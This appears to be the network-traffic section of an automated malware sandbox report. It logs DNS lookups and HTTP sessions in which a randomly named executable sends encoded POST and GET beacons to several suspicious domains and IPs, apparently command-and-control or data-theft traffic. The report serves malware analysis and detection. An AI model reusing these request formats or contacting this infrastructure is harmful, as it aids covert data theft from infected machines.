                                                                  Oct 8, 2024 14:19:48.527544975 CEST1.1.1.1192.168.2.40x9c65No error (0)thepeatear.online84.32.84.32A (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:01.676971912 CEST1.1.1.1192.168.2.40x6b6aName error (3)www.mktimediato.onlinenonenoneA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:09.763539076 CEST1.1.1.1192.168.2.40x9749Name error (3)www.schoolsfrirstfcu.orgnonenoneA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:17.835716009 CEST1.1.1.1192.168.2.40x1acdNo error (0)www.crowsecurity.cloudcrowsecurity.cloudCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:17.835716009 CEST1.1.1.1192.168.2.40x1acdNo error (0)crowsecurity.cloud3.33.130.190A (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:17.835716009 CEST1.1.1.1192.168.2.40x1acdNo error (0)crowsecurity.cloud15.197.148.33A (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:32.152512074 CEST1.1.1.1192.168.2.40xf003No error (0)www.myjiorooms.servicesmyjiorooms.servicesCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:32.152512074 CEST1.1.1.1192.168.2.40xf003No error (0)myjiorooms.services3.33.130.190A (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:32.152512074 CEST1.1.1.1192.168.2.40xf003No error (0)myjiorooms.services15.197.148.33A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • www.nad5.shop
                                                                  • www.impo232rt.xyz
                                                                  • www.cenfresh.life
                                                                  • www.digitalbloom.info
                                                                  • www.thepeatear.online
                                                                  • www.crowsecurity.cloud
                                                                  • www.myjiorooms.services

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449752156.226.22.233801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:18:22.795846939 CEST438OUTGET /i70z/?Yp=eXMH4fkp&nrs8j=8fwlLwm+T0nphGhW7PHH3xFKB5SB8SFc9+r/t0QDCeclosptBaw61DZvImsaGCeeZR7Fl0K64LM59E0NLQ1vdm4QrRMTpos6Kj6ui5/Q8OeERMbnF/TN1fg= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.nad5.shop
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Oct 8, 2024 14:18:23.711133003 CEST691INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Tue, 08 Oct 2024 12:18:23 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449835176.32.38.141801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:18:38.799689054 CEST712OUTPOST /azcx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.impo232rt.xyz
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.impo232rt.xyz
                                                                  Referer: http://www.impo232rt.xyz/azcx/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 76 70 6b 34 5a 57 39 38 46 38 7a 79 41 70 50 35 6b 63 73 65 6c 7a 2f 74 67 34 43 71 77 31 6e 49 2f 50 64 76 49 64 43 63 2b 73 44 48 6c 4e 65 4b 45 36 4a 34 31 62 48 73 70 62 51 57 72 33 62 4c 56 72 53 55 37 30 42 5a 6b 68 31 35 67 4a 6c 48 37 44 61 4d 51 49 6b 34 77 6b 31 4d 74 4c 6e 42 77 46 46 77 76 74 76 2b 53 35 6b 63 66 32 4c 42 6f 2b 32 41 49 4e 4c 70 2f 58 45 69 4c 71 50 38 54 76 4a 54 4e 73 7a 48 61 62 6d 47 61 6e 6d 37 4d 6d 63 52 31 71 56 69 57 2f 7a 47 4b 4e 5a 76 4a 43 75 70 56 4e 30 46 4a 59 6d 67 34 7a 39 4e 52 48 7a 44 76 46 47 45 6f 4a 6b 7a 56 71 64 69 69 41 3d 3d
                                                                  Data Ascii: nrs8j=vpk4ZW98F8zyApP5kcselz/tg4Cqw1nI/PdvIdCc+sDHlNeKE6J41bHspbQWr3bLVrSU70BZkh15gJlH7DaMQIk4wk1MtLnBwFFwvtv+S5kcf2LBo+2AINLp/XEiLqP8TvJTNszHabmGanm7MmcR1qViW/zGKNZvJCupVN0FJYmg4z9NRHzDvFGEoJkzVqdiiA==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449855176.32.38.141801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:18:41.334286928 CEST732OUTPOST /azcx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.impo232rt.xyz
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.impo232rt.xyz
                                                                  Referer: http://www.impo232rt.xyz/azcx/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 76 70 6b 34 5a 57 39 38 46 38 7a 79 43 4a 66 35 68 37 59 65 67 54 2f 75 76 59 43 71 35 56 6e 4d 2f 50 68 76 49 59 37 52 2f 66 72 48 6b 73 75 4b 48 2f 6c 34 30 62 48 73 6d 37 52 63 30 48 62 36 56 71 75 79 37 31 4e 5a 6b 68 78 35 67 4d 4a 48 37 55 47 44 52 59 6b 2b 6c 55 31 4f 70 4c 6e 42 77 46 46 77 76 74 36 5a 53 35 73 63 66 6d 37 42 70 66 33 57 58 39 4c 71 70 48 45 69 50 71 50 77 54 76 4a 78 4e 74 2f 68 61 64 69 47 61 69 4b 37 4e 30 34 53 37 71 55 72 4c 76 79 57 4c 4d 49 58 46 52 44 54 56 76 63 43 4b 72 69 54 39 31 73 58 41 32 53 55 39 46 69 33 31 4f 74 48 59 70 67 72 35 47 70 6a 4c 42 37 71 46 31 30 4b 62 54 5a 6d 39 2b 6e 59 48 64 41 3d
                                                                  Data Ascii: nrs8j=vpk4ZW98F8zyCJf5h7YegT/uvYCq5VnM/PhvIY7R/frHksuKH/l40bHsm7Rc0Hb6Vquy71NZkhx5gMJH7UGDRYk+lU1OpLnBwFFwvt6ZS5scfm7Bpf3WX9LqpHEiPqPwTvJxNt/hadiGaiK7N04S7qUrLvyWLMIXFRDTVvcCKriT91sXA2SU9Fi31OtHYpgr5GpjLB7qF10KbTZm9+nYHdA=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449868176.32.38.141801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:18:43.886420012 CEST10814OUTPOST /azcx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.impo232rt.xyz
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.impo232rt.xyz
                                                                  Referer: http://www.impo232rt.xyz/azcx/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 76 70 6b 34 5a 57 39 38 46 38 7a 79 43 4a 66 35 68 37 59 65 67 54 2f 75 76 59 43 71 35 56 6e 4d 2f 50 68 76 49 59 37 52 2f 66 7a 48 6b 61 36 4b 45 63 39 34 6d 4c 48 73 76 62 52 64 30 48 62 64 56 72 47 2b 37 31 52 7a 6b 69 5a 35 68 71 64 48 73 57 75 44 65 59 6b 2b 6e 55 31 4c 74 4c 6e 51 77 46 31 4b 76 74 71 5a 53 35 73 63 66 6b 7a 42 35 2b 33 57 4d 39 4c 70 2f 58 45 2b 4c 71 4f 6c 54 76 42 4c 4e 74 72 58 62 75 71 47 61 47 71 37 42 6d 67 53 33 71 55 70 49 76 7a 54 4c 4d 45 49 46 51 76 75 56 76 45 6b 4b 73 71 54 78 7a 5a 38 64 6c 69 33 76 56 4c 6f 6c 4f 4e 59 41 4b 4d 53 2b 55 5a 49 44 53 58 39 52 6b 49 67 65 44 6f 35 68 73 48 4d 65 72 46 73 4c 46 62 41 58 54 6d 67 6e 69 59 66 41 45 6e 51 75 51 6f 72 52 41 65 42 49 50 53 4d 32 70 36 32 56 2f 75 45 37 76 4d 72 79 39 36 71 57 68 4e 6b 43 64 79 64 58 4f 38 65 31 52 55 58 35 61 79 76 56 6d 6b 4b 79 6d 77 32 34 65 75 53 69 4a 7a 54 49 76 68 64 42 57 64 6f 35 76 61 64 41 51 73 48 58 62 44 4c 7a 41 4b 41 59 6e 68 51 48 64 57 48 4f 38 72 33 [TRUNCATED]
                                                                  Data Ascii: nrs8j=vpk4ZW98F8zyCJf5h7YegT/uvYCq5VnM/PhvIY7R/fzHka6KEc94mLHsvbRd0HbdVrG+71RzkiZ5hqdHsWuDeYk+nU1LtLnQwF1KvtqZS5scfkzB5+3WM9Lp/XE+LqOlTvBLNtrXbuqGaGq7BmgS3qUpIvzTLMEIFQvuVvEkKsqTxzZ8dli3vVLolONYAKMS+UZIDSX9RkIgeDo5hsHMerFsLFbAXTmgniYfAEnQuQorRAeBIPSM2p62V/uE7vMry96qWhNkCdydXO8e1RUX5ayvVmkKymw24euSiJzTIvhdBWdo5vadAQsHXbDLzAKAYnhQHdWHO8r3W6dSPpERkhhIvlFroC2tO6boa+LiRGX11ubys0RtnCklxajZ1tlQbWwJZTauvLhYf/kdOpSU8U2mALZ0rAWFz7Y125RzwEl3n87SkuJpfAcxgXfQi3v9D5BMh2K99O1KsaFQfDwngh1JhOWROk2jrMK4YC3eyigSF1wf3MXpbwk8WtZyeqPldvH+AjxB475YwkhC8vts/sP0ld3qY8BStoZ8pWMPwgdrwEzCiMe1T9wdzyf30oPddckWJOqCC4WoU+w9TSK4jHsw3TH4QIqX/i815FkrgTbRvgV+ib1bka+NTRee6RNj4BC/RKU4j02YCPIWG5ZqKdMpAfVYnCMl5o2O0hVRMu1x8ZQsD6cdwRApd0HWyXvr6UlxM2Ex0RPQXCTPsblP0wBtMgvhBk1H9m+dyfQLPzephMSfpf3jKMvWoAV8pXnZzxMvu1K6lhwilCq6BSvV07oxNdyzHk4CA8nF9vW4HLHdqA1GxznzppL+3WWpGTALdO/mrTCfWFBHgLIchquBWBbeXueylHq/FG/C+DphKx/HVDe7kDepfJr1IwTweqf6fJG1PZsuXTedvtk9Gxm67DpoU4apxmVNw5MgTw0RajwXCMn1iXjZg57SgxGBv640zP1npw4D6ca8s0Og84JXlsnQQsqSCiSYpMu+7LUfcrv6aD [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449883176.32.38.141801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:18:46.428065062 CEST442OUTGET /azcx/?nrs8j=irMYamRxHtj3NMD2tLgxvViSvpLqwhvn7ehZdObCxtX/sdDuQfcDsrOzu60Trx/UY7Wv4F1shT0OqKdZ6j2zU9VfvWpTmK3e9j1Z+5zsY7kVMmPgkcjeH9Y=&Yp=eXMH4fkp HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.impo232rt.xyz
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.450008199.192.21.169801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:13.027817011 CEST712OUTPOST /6iok/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.cenfresh.life
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.cenfresh.life
                                                                  Referer: http://www.cenfresh.life/6iok/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 47 70 55 6f 36 61 31 78 6f 70 32 74 36 55 62 67 62 49 6b 34 48 73 4f 76 2b 69 58 71 42 66 4d 51 53 6c 55 39 50 44 77 58 4b 6f 5a 43 36 5a 39 78 32 59 67 2f 4c 45 68 57 42 35 55 70 4a 78 68 6e 47 4f 44 69 56 51 6c 54 4c 33 30 66 6f 33 62 6d 51 72 63 47 51 43 56 71 62 4d 35 50 44 5a 58 64 6a 53 4f 79 2f 54 74 73 34 69 31 45 44 53 6c 55 34 69 66 69 38 77 36 2f 2b 47 79 4e 39 4b 6f 4f 32 51 78 6c 30 51 53 47 6f 45 77 6f 42 4c 49 56 68 61 76 4e 6b 78 32 75 55 56 5a 41 47 4a 4c 4d 6d 73 71 62 6f 65 74 4d 65 4e 6a 79 30 76 62 67 43 68 55 4a 6e 2f 4c 4f 68 34 49 4e 77 35 70 6f 2b 51 3d 3d
                                                                  Data Ascii: nrs8j=GpUo6a1xop2t6UbgbIk4HsOv+iXqBfMQSlU9PDwXKoZC6Z9x2Yg/LEhWB5UpJxhnGODiVQlTL30fo3bmQrcGQCVqbM5PDZXdjSOy/Tts4i1EDSlU4ifi8w6/+GyN9KoO2Qxl0QSGoEwoBLIVhavNkx2uUVZAGJLMmsqboetMeNjy0vbgChUJn/LOh4INw5po+Q==
                                                                  Oct 8, 2024 14:19:13.616738081 CEST980INHTTP/1.1 404 Not Found
                                                                  Date: Tue, 08 Oct 2024 12:19:13 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 774
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.450009199.192.21.169801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:15.572783947 CEST732OUTPOST /6iok/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.cenfresh.life
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.cenfresh.life
                                                                  Referer: http://www.cenfresh.life/6iok/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 47 70 55 6f 36 61 31 78 6f 70 32 74 37 30 4c 67 63 76 77 34 57 38 4f 73 78 43 58 71 4f 2f 4d 55 53 6c 51 39 50 44 5a 4b 4e 61 4e 43 39 37 6c 78 31 64 63 2f 59 30 68 57 5a 4a 55 6f 52 52 68 75 47 4f 4f 64 56 56 64 54 4c 33 67 66 6f 32 72 6d 58 63 6f 46 52 53 56 6f 4f 63 35 4a 4f 35 58 64 6a 53 4f 79 2f 54 35 43 34 69 74 45 44 42 39 55 33 6a 66 68 77 51 36 34 35 47 79 4e 35 4b 6f 4b 32 51 77 79 30 55 4c 74 6f 48 59 6f 42 4f 30 56 68 72 76 4f 2f 68 32 6f 4c 46 5a 57 41 4d 75 34 70 4f 4b 56 6e 4d 6c 5a 42 73 44 56 38 4a 4b 36 54 51 31 65 31 2f 76 39 38 2f 42 35 39 36 55 68 6c 56 73 41 71 2b 50 34 62 78 6c 76 66 37 55 48 76 4f 6f 48 47 71 45 3d
                                                                  Data Ascii: nrs8j=GpUo6a1xop2t70Lgcvw4W8OsxCXqO/MUSlQ9PDZKNaNC97lx1dc/Y0hWZJUoRRhuGOOdVVdTL3gfo2rmXcoFRSVoOc5JO5XdjSOy/T5C4itEDB9U3jfhwQ645GyN5KoK2Qwy0ULtoHYoBO0VhrvO/h2oLFZWAMu4pOKVnMlZBsDV8JK6TQ1e1/v98/B596UhlVsAq+P4bxlvf7UHvOoHGqE=
                                                                  Oct 8, 2024 14:19:16.182003021 CEST980INHTTP/1.1 404 Not Found
                                                                  Date: Tue, 08 Oct 2024 12:19:16 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 774
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.450010199.192.21.169801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:18.120992899 CEST10814OUTPOST /6iok/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.cenfresh.life
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.cenfresh.life
                                                                  Referer: http://www.cenfresh.life/6iok/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 47 70 55 6f 36 61 31 78 6f 70 32 74 37 30 4c 67 63 76 77 34 57 38 4f 73 78 43 58 71 4f 2f 4d 55 53 6c 51 39 50 44 5a 4b 4e 61 56 43 39 4f 78 78 33 36 49 2f 62 30 68 57 51 70 55 74 52 52 67 2b 47 4f 57 5a 56 56 67 78 4c 31 59 66 36 45 54 6d 57 75 41 46 61 53 56 6f 52 73 35 4d 44 5a 57 41 6a 53 65 2b 2f 54 70 43 34 69 74 45 44 48 35 55 2b 53 66 68 79 51 36 2f 2b 47 79 33 39 4b 6f 79 32 51 34 69 30 55 48 62 72 33 34 6f 43 75 45 56 78 4e 37 4f 7a 68 32 71 4b 46 59 56 41 4d 71 6e 70 4f 6e 71 6e 4e 52 7a 42 73 33 56 35 4f 47 6a 48 69 31 79 68 39 6a 44 74 49 35 52 79 35 68 6e 6d 53 6b 68 36 65 72 77 59 41 5a 46 62 34 34 4e 30 64 77 4e 51 66 72 2b 45 72 6c 74 70 77 46 42 41 43 41 7a 73 4b 43 4c 73 4d 74 66 62 50 79 70 4e 48 31 77 68 6b 48 73 55 62 69 47 39 77 4e 41 59 39 4d 34 54 36 72 4c 47 70 77 46 32 6d 45 36 45 71 42 64 71 2f 71 55 7a 2b 55 4b 43 54 63 54 34 50 71 4e 75 45 44 34 65 53 32 36 69 54 42 51 42 69 32 65 50 68 47 38 67 6c 43 42 50 4b 53 30 6a 42 37 75 6c 6e 4a 30 42 58 62 74 [TRUNCATED]
